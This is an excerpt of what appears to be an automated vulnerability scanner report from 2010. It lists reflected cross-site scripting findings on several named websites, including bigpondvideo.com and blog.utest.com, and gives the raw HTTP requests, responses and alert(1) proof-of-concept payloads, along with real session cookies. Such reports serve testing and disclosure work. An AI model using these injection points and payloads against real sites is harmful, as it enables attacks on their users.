HTTP/1.1 200 OK Date: Tue, 23 Nov 2010 03:08:44 GMT Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5 X-Powered-By: PHP/5.2.13 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Connection: close Content-Length: 58310
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="X-UA-C ...[SNIP]... /go/getflashplayer', 'wmode','transparent', 'FlashVars','randFlashId=NV4ceb303c44555&platform=Production&phpSessionId=9b7c6ddb0174e371d6c21a37721a97ca&ref=Net-Head-TV-Games17b81</script><script>alert(1)</script>cb1d9075c4b&navId=473&channelTitle=Games&targetLevel=Videos.Games.Latest&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code </script> ...[SNIP]...
2.505. http://bigpondvideo.com/leaguetv/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://bigpondvideo.com
Path:
/leaguetv/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bba89</script><script>alert(1)</script>ab16827882a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /leaguetv/?bba89</script><script>alert(1)</script>ab16827882a=1 HTTP/1.1 Host: bigpondvideo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=BigPond%20TV; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1290484594824; PHPSESSID=9b7c6ddb0174e371d6c21a37721a97ca; gpv_e48=BP%3ABigPond%20TV%3AHomepage; gpv_p43=BP%3ABigPond%20TV%3AHomepage; s_sv_sid=453774846568; gpv_e44=BigPond%20TV;
Response
HTTP/1.1 200 OK Date: Tue, 23 Nov 2010 03:08:27 GMT Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5 X-Powered-By: PHP/5.2.13 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Connection: close Content-Length: 58314
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="X-UA-C ...[SNIP]... ://www.macromedia.com/go/getflashplayer', 'wmode','transparent', 'FlashVars','randFlashId=NV4ceb302be0af5&platform=Production&phpSessionId=9b7c6ddb0174e371d6c21a37721a97ca&bba89</script><script>alert(1)</script>ab16827882a=1&channelId=104&channelTitle=leaguetv&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code </script> ...[SNIP]...
The value of the ref request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cceff</script><script>alert(1)</script>01879efc31d was submitted in the ref parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /leaguetv/?ref=Net-Head-TV-Leaguecceff</script><script>alert(1)</script>01879efc31d HTTP/1.1 Host: bigpondvideo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=BigPond%20TV; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1290484594824; PHPSESSID=9b7c6ddb0174e371d6c21a37721a97ca; gpv_e48=BP%3ABigPond%20TV%3AHomepage; gpv_p43=BP%3ABigPond%20TV%3AHomepage; s_sv_sid=453774846568; gpv_e44=BigPond%20TV;
Response
HTTP/1.1 200 OK Date: Tue, 23 Nov 2010 03:08:22 GMT Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5 X-Powered-By: PHP/5.2.13 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Connection: close Content-Length: 58334
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="X-UA-C ...[SNIP]... go/getflashplayer', 'wmode','transparent', 'FlashVars','randFlashId=NV4ceb3027167da&platform=Production&phpSessionId=9b7c6ddb0174e371d6c21a37721a97ca&ref=Net-Head-TV-Leaguecceff</script><script>alert(1)</script>01879efc31d&channelId=104&channelTitle=leaguetv&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code </script> ...[SNIP]...
2.507. http://bigpondvideo.com/musictv/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://bigpondvideo.com
Path:
/musictv/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4f5f5</script><script>alert(1)</script>7eead953a9f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /musictv/?4f5f5</script><script>alert(1)</script>7eead953a9f=1 HTTP/1.1 Host: bigpondvideo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=BigPond%20TV; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1290484594824; PHPSESSID=9b7c6ddb0174e371d6c21a37721a97ca; gpv_e48=BP%3ABigPond%20TV%3AHomepage; gpv_p43=BP%3ABigPond%20TV%3AHomepage; s_sv_sid=453774846568; gpv_e44=BigPond%20TV;
Response
HTTP/1.1 200 OK Date: Tue, 23 Nov 2010 03:09:03 GMT Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5 X-Powered-By: PHP/5.2.13 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Connection: close Content-Length: 58313
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="X-UA-C ...[SNIP]... ://www.macromedia.com/go/getflashplayer', 'wmode','transparent', 'FlashVars','randFlashId=NV4ceb304fdcfb9&platform=Production&phpSessionId=9b7c6ddb0174e371d6c21a37721a97ca&4f5f5</script><script>alert(1)</script>7eead953a9f=1&channelId=101&channelTitle=musictv&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code </script> ...[SNIP]...
The value of the ref request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a042b</script><script>alert(1)</script>3171aedcdae was submitted in the ref parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /musictv/?ref=Net-Head-TV-MusicTVa042b</script><script>alert(1)</script>3171aedcdae HTTP/1.1 Host: bigpondvideo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=BigPond%20TV; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1290484594824; PHPSESSID=9b7c6ddb0174e371d6c21a37721a97ca; gpv_e48=BP%3ABigPond%20TV%3AHomepage; gpv_p43=BP%3ABigPond%20TV%3AHomepage; s_sv_sid=453774846568; gpv_e44=BigPond%20TV;
Response
HTTP/1.1 200 OK Date: Tue, 23 Nov 2010 03:09:05 GMT Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5 X-Powered-By: PHP/5.2.13 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Connection: close Content-Length: 58334
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="X-UA-C ...[SNIP]... o/getflashplayer', 'wmode','transparent', 'FlashVars','randFlashId=NV4ceb305140959&platform=Production&phpSessionId=9b7c6ddb0174e371d6c21a37721a97ca&ref=Net-Head-TV-MusicTVa042b</script><script>alert(1)</script>3171aedcdae&channelId=101&channelTitle=musictv&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code </script> ...[SNIP]...
2.509. http://bigpondvideo.com/newstv/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://bigpondvideo.com
Path:
/newstv/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1aecf</script><script>alert(1)</script>2fcfa8ae8f1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /newstv/?1aecf</script><script>alert(1)</script>2fcfa8ae8f1=1 HTTP/1.1 Host: bigpondvideo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Tue, 23 Nov 2010 02:48:51 GMT Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5 X-Powered-By: PHP/5.2.13 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: PHPSESSID=5e0bafb1ce82541845e1ddc941d367b0; path=/ Content-Type: text/html Connection: close Content-Length: 58312
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="X-UA-C ...[SNIP]... ://www.macromedia.com/go/getflashplayer', 'wmode','transparent', 'FlashVars','randFlashId=NV4ceb2b9335153&platform=Production&phpSessionId=5e0bafb1ce82541845e1ddc941d367b0&1aecf</script><script>alert(1)</script>2fcfa8ae8f1=1&channelId=106&channelTitle=newstv&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code </script> ...[SNIP]...
The value of the ref request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4bd11</script><script>alert(1)</script>4928acb5bca was submitted in the ref parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /newstv/?ref=Net-Head-TV-NewsTV4bd11</script><script>alert(1)</script>4928acb5bca HTTP/1.1 Host: bigpondvideo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=BigPond%20TV; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1290484594824; PHPSESSID=9b7c6ddb0174e371d6c21a37721a97ca; gpv_e48=BP%3ABigPond%20TV%3AHomepage; gpv_p43=BP%3ABigPond%20TV%3AHomepage; s_sv_sid=453774846568; gpv_e44=BigPond%20TV;
Response
HTTP/1.1 200 OK Date: Tue, 23 Nov 2010 03:07:54 GMT Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5 X-Powered-By: PHP/5.2.13 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Connection: close Content-Length: 58332
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="X-UA-C ...[SNIP]... go/getflashplayer', 'wmode','transparent', 'FlashVars','randFlashId=NV4ceb300a1e078&platform=Production&phpSessionId=9b7c6ddb0174e371d6c21a37721a97ca&ref=Net-Head-TV-NewsTV4bd11</script><script>alert(1)</script>4928acb5bca&channelId=106&channelTitle=newstv&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code </script> ...[SNIP]...
2.511. http://bigpondvideo.com/racingtv/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://bigpondvideo.com
Path:
/racingtv/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 519fd</script><script>alert(1)</script>c34c16aedfb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /racingtv/?519fd</script><script>alert(1)</script>c34c16aedfb=1 HTTP/1.1 Host: bigpondvideo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=BigPond%20TV; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1290484594824; PHPSESSID=9b7c6ddb0174e371d6c21a37721a97ca; gpv_e48=BP%3ABigPond%20TV%3AHomepage; gpv_p43=BP%3ABigPond%20TV%3AHomepage; s_sv_sid=453774846568; gpv_e44=BigPond%20TV;
Response
HTTP/1.1 200 OK Date: Tue, 23 Nov 2010 03:08:33 GMT Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5 X-Powered-By: PHP/5.2.13 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Connection: close Content-Length: 58314
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="X-UA-C ...[SNIP]... ://www.macromedia.com/go/getflashplayer', 'wmode','transparent', 'FlashVars','randFlashId=NV4ceb3031b6bdc&platform=Production&phpSessionId=9b7c6ddb0174e371d6c21a37721a97ca&519fd</script><script>alert(1)</script>c34c16aedfb=1&channelId=105&channelTitle=racingtv&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code </script> ...[SNIP]...
The value of the ref request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e27dc</script><script>alert(1)</script>1c3586a0fb8 was submitted in the ref parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /racingtv/?ref=Net-Head-TV-Sport-Racinge27dc</script><script>alert(1)</script>1c3586a0fb8 HTTP/1.1 Host: bigpondvideo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=BigPond%20TV; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1290484594824; PHPSESSID=9b7c6ddb0174e371d6c21a37721a97ca; gpv_e48=BP%3ABigPond%20TV%3AHomepage; gpv_p43=BP%3ABigPond%20TV%3AHomepage; s_sv_sid=453774846568; gpv_e44=BigPond%20TV;
Response
HTTP/1.1 200 OK Date: Tue, 23 Nov 2010 03:08:22 GMT Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5 X-Powered-By: PHP/5.2.13 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Connection: close Content-Length: 58340
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="X-UA-C ...[SNIP]... flashplayer', 'wmode','transparent', 'FlashVars','randFlashId=NV4ceb302698305&platform=Production&phpSessionId=9b7c6ddb0174e371d6c21a37721a97ca&ref=Net-Head-TV-Sport-Racinge27dc</script><script>alert(1)</script>1c3586a0fb8&channelId=105&channelTitle=racingtv&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code </script> ...[SNIP]...
2.513. http://bigpondvideo.com/surfing/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://bigpondvideo.com
Path:
/surfing/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c8ade</script><script>alert(1)</script>6d3d9e41987 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /surfing/?c8ade</script><script>alert(1)</script>6d3d9e41987=1 HTTP/1.1 Host: bigpondvideo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=BigPond%20TV; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1290484594824; PHPSESSID=9b7c6ddb0174e371d6c21a37721a97ca; gpv_e48=BP%3ABigPond%20TV%3AHomepage; gpv_p43=BP%3ABigPond%20TV%3AHomepage; s_sv_sid=453774846568; gpv_e44=BigPond%20TV;
Response
HTTP/1.1 200 OK Date: Tue, 23 Nov 2010 03:08:42 GMT Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5 X-Powered-By: PHP/5.2.13 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Connection: close Content-Length: 58325
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="X-UA-C ...[SNIP]... ://www.macromedia.com/go/getflashplayer', 'wmode','transparent', 'FlashVars','randFlashId=NV4ceb303a0eebb&platform=Production&phpSessionId=9b7c6ddb0174e371d6c21a37721a97ca&c8ade</script><script>alert(1)</script>6d3d9e41987=1&navId=775&channelTitle=Surfing&targetLevel=Videos.Sport.Surfing.All Surfing&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code </script> ...[SNIP]...
The value of the ref request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 15c38</script><script>alert(1)</script>addf8fba4dc was submitted in the ref parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /surfing/?ref=Net-Head-TV-Sport-Surf15c38</script><script>alert(1)</script>addf8fba4dc HTTP/1.1 Host: bigpondvideo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=BigPond%20TV; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1290484594824; PHPSESSID=9b7c6ddb0174e371d6c21a37721a97ca; gpv_e48=BP%3ABigPond%20TV%3AHomepage; gpv_p43=BP%3ABigPond%20TV%3AHomepage; s_sv_sid=453774846568; gpv_e44=BigPond%20TV;
Response
HTTP/1.1 200 OK Date: Tue, 23 Nov 2010 03:08:36 GMT Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5 X-Powered-By: PHP/5.2.13 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Connection: close Content-Length: 58349
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="X-UA-C ...[SNIP]... etflashplayer', 'wmode','transparent', 'FlashVars','randFlashId=NV4ceb30351a597&platform=Production&phpSessionId=9b7c6ddb0174e371d6c21a37721a97ca&ref=Net-Head-TV-Sport-Surf15c38</script><script>alert(1)</script>addf8fba4dc&navId=775&channelTitle=Surfing&targetLevel=Videos.Sport.Surfing.All Surfing&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code </script> ...[SNIP]...
2.515. http://bigpondvideo.com/v8/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://bigpondvideo.com
Path:
/v8/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload edabd</script><script>alert(1)</script>12df95b1764 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /v8/?edabd</script><script>alert(1)</script>12df95b1764=1 HTTP/1.1 Host: bigpondvideo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=BigPond%20TV; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1290484594824; PHPSESSID=9b7c6ddb0174e371d6c21a37721a97ca; gpv_e48=BP%3ABigPond%20TV%3AHomepage; gpv_p43=BP%3ABigPond%20TV%3AHomepage; s_sv_sid=453774846568; gpv_e44=BigPond%20TV;
Response
HTTP/1.1 200 OK Date: Tue, 23 Nov 2010 03:08:40 GMT Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5 X-Powered-By: PHP/5.2.13 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Connection: close Content-Length: 58333
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="X-UA-C ...[SNIP]... ://www.macromedia.com/go/getflashplayer', 'wmode','transparent', 'FlashVars','randFlashId=NV4ceb303866a75&platform=Production&phpSessionId=9b7c6ddb0174e371d6c21a37721a97ca&edabd</script><script>alert(1)</script>12df95b1764=1&navId=143&channelTitle=V8Supercars&targetLevel=Videos.Sport.V8Supercars&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code </script> ...[SNIP]...
The value of the ref request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 721fa</script><script>alert(1)</script>8151d9e734e was submitted in the ref parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /v8/?ref=Net-Head-TV-Sport-V8s721fa</script><script>alert(1)</script>8151d9e734e HTTP/1.1 Host: bigpondvideo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=BigPond%20TV; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1290484594824; PHPSESSID=9b7c6ddb0174e371d6c21a37721a97ca; gpv_e48=BP%3ABigPond%20TV%3AHomepage; gpv_p43=BP%3ABigPond%20TV%3AHomepage; s_sv_sid=453774846568; gpv_e44=BigPond%20TV;
Response
HTTP/1.1 200 OK Date: Tue, 23 Nov 2010 03:08:40 GMT Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5 X-Powered-By: PHP/5.2.13 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Connection: close Content-Length: 58356
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="X-UA-C ...[SNIP]... getflashplayer', 'wmode','transparent', 'FlashVars','randFlashId=NV4ceb303821fcf&platform=Production&phpSessionId=9b7c6ddb0174e371d6c21a37721a97ca&ref=Net-Head-TV-Sport-V8s721fa</script><script>alert(1)</script>8151d9e734e&navId=143&channelTitle=V8Supercars&targetLevel=Videos.Sport.V8Supercars&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code </script> ...[SNIP]...
2.517. http://blog.utest.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://blog.utest.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c12f5"><script>alert(1)</script>8dbfb50b0c1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c12f5\\\"><script>alert(1)</script>8dbfb50b0c1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?c12f5"><script>alert(1)</script>8dbfb50b0c1=1 HTTP/1.1 Host: blog.utest.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Tue, 23 Nov 2010 03:27:42 GMT Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g X-Powered-By: PHP/5.2.6-1+lenny9 X-Pingback: http://blog.utest.com/xmlrpc.php Set-Cookie: mkeng_id=156b53d184ba4daf55943195c5d3c6e02012fd91; expires=Thu, 01-Jan-2015 03:27:42 GMT; path=/; domain=.utest.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 80898
<!--mclude mevisit.php--> <!--/mclude--> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/199 ...[SNIP]... <a href="http://blog.utest.com/?c12f5\\\"><script>alert(1)</script>8dbfb50b0c1=1"> ...[SNIP]...
The value of the npui request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 47ee7%3balert(1)//f80d364f94 was submitted in the npui parameter. This input was echoed as 47ee7;alert(1)//f80d364f94 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7e0d1"%3b5c0f2728282 was submitted in the REST URL parameter 2. This input was echoed as 7e0d1";5c0f2728282 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /dvd/7e0d1"%3b5c0f2728282/Too-Late-To-Say-Goodbye?a=15401&utm_source=promotile100x70&utm_medium=online&utm_campaign=bpcomtile&cid=ZBP_MOV_Too-Late-To-Say-Goodbye_100x70_231110 HTTP/1.1 Host: dvd.bigpondmovies.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
